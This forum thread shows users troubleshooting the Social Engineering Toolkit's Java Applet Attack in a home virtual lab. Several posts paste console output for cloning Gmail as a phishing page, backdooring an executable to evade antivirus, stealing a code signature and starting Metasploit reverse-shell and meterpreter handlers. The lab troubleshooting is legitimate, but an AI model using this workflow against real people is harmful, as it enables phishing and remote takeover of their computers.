Results 1 to 5 of 5

Thread: SET not Cloning sites

  1. #1
    Just burned his ISO
    Join Date
    Jan 2012
    Posts
    2

    Exclamation SET not Cloning sites

    Hello,
    I have regarding a problem based on Social Engineering Tool-kit, but the thing is same question has been posted by someone before me & he didnt get any solution, mine is similar to it.. if you have any idea regarding this subject please suggest me, i would greatly appreciate your help, i looked all over web, couldn't get any solution & Finally i had to come here.

    Iam facing a strange problem within Social Engineering Toolkit, I have backtrack 5R2 in virtual environment with target windows XP SP2,
    when i use the Java Applet Attack method, when i click the cloned site on xp machine instead of opening a meterpreter session i get this error (shown below ) right after msf loads, i have Reinstalled the BT5 R2 O.S itself & updated SET Twice, but no use. please let me know if you have any suggestions.

    Regards.


    Web Server Launched. Welcome to the SET Web Attack.
    ************************************************** *

    [--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]

    Moving payload into cloned website.
    The site has been moved. SET Web Server is now listening..
    [-] Launching MSF Listener...
    [-] This may take a few to load MSF...
    *] Started reverse handler on 10.0.2.15:8080
    Starting the payload handler...
    Exploit running as background job.

    msf exploit(handler) >

    Started reverse handler on 10.0.2.15:8081
    Starting the payload handler...

    192.168.56.102 - - [01/Jul/2012 06:44:51] "GET / HTTP/1.1" 200 -
    192.168.56.102 - - [01/Jul/2012 06:44:52] code 404, message File not found
    192.168.56.102 - - [01/Jul/2012 06:44:52] "GET /Java.class HTTP/1.1" 404 -
    192.168.56.102 - - [01/Jul/2

  2. #2
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: SET not Cloning sites

    Looks like the server can't find some files. Could you post the exact staps you took ?
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2012
    Posts
    2

    Default Re: SET not Cloning sites

    Quote Originally Posted by LHYX1 View Post
    Looks like the server can't find some files. Could you post the exact staps you took ?

    First i got two machines inside virtual box , XP SP2 - 192.168.56.102 , Backtrack 5R2. - 192.168.56.101

    Website Attack Vectors > Java Applet Attack Method > Web Templates > Gmail

    Select a template:2
    Code:
    [*] Cloning the website: https://gmail.com[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: GQ8v9SlNeEXSxym[*] Malicious java applet website prepped for deployment
    
    set:payloads> Windows Reverse_TCP Meterpreter
    
    Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best
    
    Backdoored Executable (BEST)
    
    PORT of the listener [443] (Press Enter)
    
    *] Generating x64-based powershell injection code...[*] Generating x86-based powershell injection code...[*] Finished generating powershell injection attack and is encoded to bypass execution restriction...
    [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...[*] Backdoor completed successfully. Payload is now hidden within a legit executable.[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
    [-] Packing the executable and obfuscating PE file randomly, one moment.[*] Digital Signature Stealing is ON, hijacking a legit digital certificate[*] Generating OSX payloads through Metasploit...[*] Generating Linux payloads through Metasploit...
    
    ***************************************************
    Web Server Launched. Welcome to the SET Web Attack.
    ***************************************************
    
    [--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
    [*] Moving payload into cloned website.[*] The site has been moved. SET Web Server is now listening..
    [-] Launching MSF Listener...
    [-] This may take a few to load MSF...
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***
    
    =[ metasploit v4.2.0-release [core:4.2 api:1.0]
    + -- --=[ 805 exploits - 451 auxiliary - 135 post
    + -- --=[ 246 payloads - 27 encoders - 8 nops
           =[ svn r14805 updated 134 days ago (2012.02.23)
    
    Warning: This copy of the Metasploit Framework was last updated 134 days ago.
             We recommend that you update the framework at least every other day.
             For information on updating your copy of Metasploit, please see:
                 https://community.rapid7.com/docs/DOC-1306
    [*] Processing /pentest/exploits/set/src/program_junk/meta_config for ERB directives.
    resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
    resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
    PAYLOAD => osx/x86/shell_reverse_tcp
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
    LHOST => 10.0.2.15
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8080
    LPORT => 8080
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
    InitialAutoRunScript => post/osx/gather/enum_osx
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...[*] Exploit running as background job.
    resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
    PAYLOAD => linux/x86/shell/reverse_tcp
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
    LHOST => 10.0.2.15
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8081
    LPORT => 8081
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Started reverse handler on 10.0.2.15:8080 [*] Starting the payload handler...[*] Exploit running as background job.
    msf  exploit(handler) > [*] Started reverse handler on 10.0.2.15:8081 [*] Starting the payload handler...
    
    After this i browse xp machine with backtrack ip 192.168.56.101,
    
    then i get this on BT5...
    
    192.168.56.102 - - [06/Jul/2012 22:36:12] "GET / HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:20] "GET /Signed_Update.jar HTTP/1.1" 200 -
    uninstalled BT5 & xp, reinstalled & did an SET update too, its same picture i get.

    Regards
    skorpinok

  4. #4
    Just burned his ISO
    Join Date
    Aug 2012
    Posts
    3

    Default Re: SET not Cloning sites

    Quote Originally Posted by skorpinok7 View Post
    First i got two machines inside virtual box , XP SP2 - 192.168.56.102 , Backtrack 5R2. - 192.168.56.101

    Website Attack Vectors > Java Applet Attack Method > Web Templates > Gmail

    Select a template:2
    Code:
    [*] Cloning the website: https://gmail.com[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: GQ8v9SlNeEXSxym[*] Malicious java applet website prepped for deployment
    
    set:payloads> Windows Reverse_TCP Meterpreter
    
    Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best
    
    
    
    Backdoored Executable (BEST)
    
    PORT of the listener [443] (Press Enter)
    
    *] Generating x64-based powershell injection code...[*] Generating x86-based powershell injection code...[*] Finished generating powershell injection attack and is encoded to bypass execution restriction...
    [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...[*] Backdoor completed successfully. Payload is now hidden within a legit executable.[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
    [-] Packing the executable and obfuscating PE file randomly, one moment.[*] Digital Signature Stealing is ON, hijacking a legit digital certificate[*] Generating OSX payloads through Metasploit...[*] Generating Linux payloads through Metasploit...
    
    ***************************************************
    Web Server Launched. Welcome to the SET Web Attack.
    ***************************************************
    
    [--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
    [*] Moving payload into cloned website.[*] The site has been moved. SET Web Server is now listening..
    [-] Launching MSF Listener...
    [-] This may take a few to load MSF...
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***
    
    =[ metasploit v4.2.0-release [core:4.2 api:1.0]
    + -- --=[ 805 exploits - 451 auxiliary - 135 post
    + -- --=[ 246 payloads - 27 encoders - 8 nops
           =[ svn r14805 updated 134 days ago (2012.02.23)
    
    Warning: This copy of the Metasploit Framework was last updated 134 days ago.
             We recommend that you update the framework at least every other day.
             For information on updating your copy of Metasploit, please see:
                 https://community.rapid7.com/docs/DOC-1306
    [*] Processing /pentest/exploits/set/src/program_junk/meta_config for ERB directives.
    resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
    resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
    PAYLOAD => osx/x86/shell_reverse_tcp
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
    LHOST => 10.0.2.15
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8080
    LPORT => 8080
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
    InitialAutoRunScript => post/osx/gather/enum_osx
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...[*] Exploit running as background job.
    resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
    PAYLOAD => linux/x86/shell/reverse_tcp
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
    LHOST => 10.0.2.15
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8081
    LPORT => 8081
    resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Started reverse handler on 10.0.2.15:8080 [*] Starting the payload handler...[*] Exploit running as background job.
    msf  exploit(handler) > [*] Started reverse handler on 10.0.2.15:8081 [*] Starting the payload handler...
    
    After this i browse xp machine with backtrack ip 192.168.56.101,
    
    then i get this on BT5...
    
    192.168.56.102 - - [06/Jul/2012 22:36:12] "GET / HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -
    
    192.168.56.102 - - [06/Jul/2012 22:36:20] "GET /Signed_Update.jar HTTP/1.1" 200 -
    uninstalled BT5 & xp, reinstalled & did an SET update too, its same picture i get.

    Regards
    skorpinok
    Has anyone found a solution for this issue? I have been stuck on this for a couple of weeks. I am willing to pay for a solution.
    Thanks.

  5. #5
    Junior Member Lancha's Avatar
    Join Date
    Mar 2012
    Location
    in volcano
    Posts
    30

    Default Re: SET not Cloning sites

    i have the same problem with you

Similar Threads

  1. Upgrading Laptop HDD - Cloning to external HDD?
    By RonaldRayGun in forum BackTrack 5 General Topics
    Replies: 1
    Last Post: 04-09-2012, 09:08 PM
  2. SET & cloning webpage
    By MapEndo in forum BackTrack 5 General Topics
    Replies: 6
    Last Post: 03-30-2012, 08:35 AM
  3. Command used in SET for cloning
    By Jadager in forum BackTrack 5 General Topics
    Replies: 1
    Last Post: 09-10-2011, 08:48 AM
  4. detecting MAC cloning, e.g. using RARP
    By john99 in forum OLD Newbie Area
    Replies: 2
    Last Post: 10-20-2008, 10:03 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •